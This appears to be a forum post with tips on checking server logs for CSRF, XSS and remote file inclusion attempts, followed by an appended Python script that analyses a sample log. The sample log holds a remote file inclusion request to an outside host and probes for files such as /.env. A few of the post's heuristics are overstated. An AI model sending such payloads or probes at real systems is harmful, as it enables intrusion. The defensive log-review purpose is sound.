
(Brent) #1

Check Your Log Files

Every server comes with log files that you can access. Many hosting
companies even give you detailed statistics that show you where visitors
have gone and what they did.

Normally, we just use these to check the number of visitors, what browsers
they used, where they came from, when they came and which websites
were most successful. This is what makes us happy and allows us to track
our progress.

That is not really the interesting part of the statistics package or log files,
though:

  • Check how many forms have been sent and who tried to send them.
    This is an indicator of CSRF and XSS attacks.

  • Check the server traffic and which files were frequently called. If the
    forms are old and not frequently used, you have a CSRF attack on your
    hands.

  • Search the logs for “txt?” endings, which are an indicator of RFI attacks.
    Try them out on your website; if they work, alarm bells should go off in
    your head. An exception to this is robots.txt, which is a file that search
    engines request before reading a folder; this is not an issue and
    wouldn’t be followed by a question mark, anyway.

  • Check the error messages and how many of them were 404 errors
    (“Page not found”). Check what file names people were looking for,
    which folders they attempted to access and what files they tried to read.

  • Check which users tried to authenticate. If a user you don’t know was
    causing a lot of traffic, they already have control of your server.
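
The checks listed in the post can be run over an access log with a short script rather than by eye. The example below is added here and is not code from the post or its author; it assumes the common Apache/nginx "combined" log format and works on a constructed sample log embedded inline (the hosts, paths and user names are made up). It counts form submissions per client and per form handler, lists the most frequently called files, flags requests ending in "txt?" while excluding robots.txt, tallies 404 paths, and reports the user names seen on 401 responses plus any authenticated or attempting user not on a list of known accounts.

```python
import re
from collections import Counter

# Constructed sample access log in "combined" format (assumed data, not from the post).
# Fields: host ident user [time] "request" status size "referer" "agent"
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "POST /contact.php HTTP/1.1" 200 310 "https://example.test/contact" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "POST /contact.php HTTP/1.1" 200 310 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "POST /contact.php HTTP/1.1" 200 310 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:56:03 +0000] "POST /old-form.php HTTP/1.1" 200 290 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "GET /page.php?inc=http://203.0.113.99/remote.txt? HTTP/1.1" 200 1200 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:57:20 +0000] "GET /robots.txt HTTP/1.1" 200 60 "-" "Googlebot/2.1"
198.51.100.7 - - [10/Oct/2023:13:58:00 +0000] "GET /wp-login.php HTTP/1.1" 404 210 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:58:01 +0000] "GET /admin/ HTTP/1.1" 404 210 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:58:02 +0000] "GET /.env HTTP/1.1" 404 210 "-" "curl/8.0"
198.51.100.7 - - [10/Oct/2023:13:59:00 +0000] "GET /private/ HTTP/1.1" 401 120 "-" "curl/8.0"
198.51.100.7 - guest [10/Oct/2023:13:59:05 +0000] "GET /private/ HTTP/1.1" 401 120 "-" "curl/8.0"
203.0.113.5 - alice [10/Oct/2023:14:00:00 +0000] "GET /private/ HTTP/1.1" 200 800 "-" "Mozilla/5.0"
"""

# One regex for the combined format; referer and user agent are optional so the
# plainer "common" format parses too.
LOG_RE = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?\s*$'
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match the format."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def analyse(lines, known_users=frozenset()):
    """Run the post's checks over an iterable of log lines and return the findings."""
    report = {
        "posts_by_client": Counter(),   # who submitted forms, and how often
        "posts_by_form": Counter(),     # which form handlers received POSTs
        "requests_by_path": Counter(),  # which files were called most often
        "txt_requests": [],             # (client, request) pairs ending in "txt?"
        "not_found": Counter(),         # 404 paths, query string stripped
        "auth_failures": Counter(),     # user names on 401 responses ("-" = none supplied)
        "unknown_users": set(),         # user names seen that are not in known_users
    }
    for line in lines:
        e = parse_line(line)
        if e is None:
            continue  # skip lines that are not in the expected format
        path = e["path"]
        bare_path = path.split("?", 1)[0]
        report["requests_by_path"][bare_path] += 1
        if e["method"] == "POST":
            report["posts_by_client"][e["host"]] += 1
            report["posts_by_form"][bare_path] += 1
        # RFI indicator from the post: request ends in "txt?". robots.txt never carries
        # a trailing "?" so it cannot match, but the exception is made explicit here.
        if path.lower().endswith("txt?") and bare_path != "/robots.txt":
            report["txt_requests"].append((e["host"], path))
        if e["status"] == 404:
            report["not_found"][bare_path] += 1
        if e["status"] == 401:
            report["auth_failures"][e["user"]] += 1
        if e["user"] != "-" and e["user"] not in known_users:
            report["unknown_users"].add(e["user"])
    return report


def main():
    # "alice" is the one account assumed to be legitimate in the constructed sample.
    report = analyse(SAMPLE_LOG.splitlines(), known_users={"alice"})
    print("Form submissions per client:", dict(report["posts_by_client"]))
    print("POSTs per form handler:     ", dict(report["posts_by_form"]))
    print("Most requested paths:       ", report["requests_by_path"].most_common(3))
    print("'txt?' requests (RFI check):", report["txt_requests"])
    print("404 paths probed:           ", dict(report["not_found"]))
    print("Users on 401 responses:     ", dict(report["auth_failures"]))
    print("Unknown user names seen:    ", sorted(report["unknown_users"]))


if __name__ == "__main__":
    main()
```

On a real server, feed the script the access log instead of `SAMPLE_LOG` and keep `known_users` in step with the accounts that are actually supposed to exist; a burst of POSTs from a single client to a handler nobody links to any more, or a "txt?" request from the same client, is the kind of pattern the post tells you to look for.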
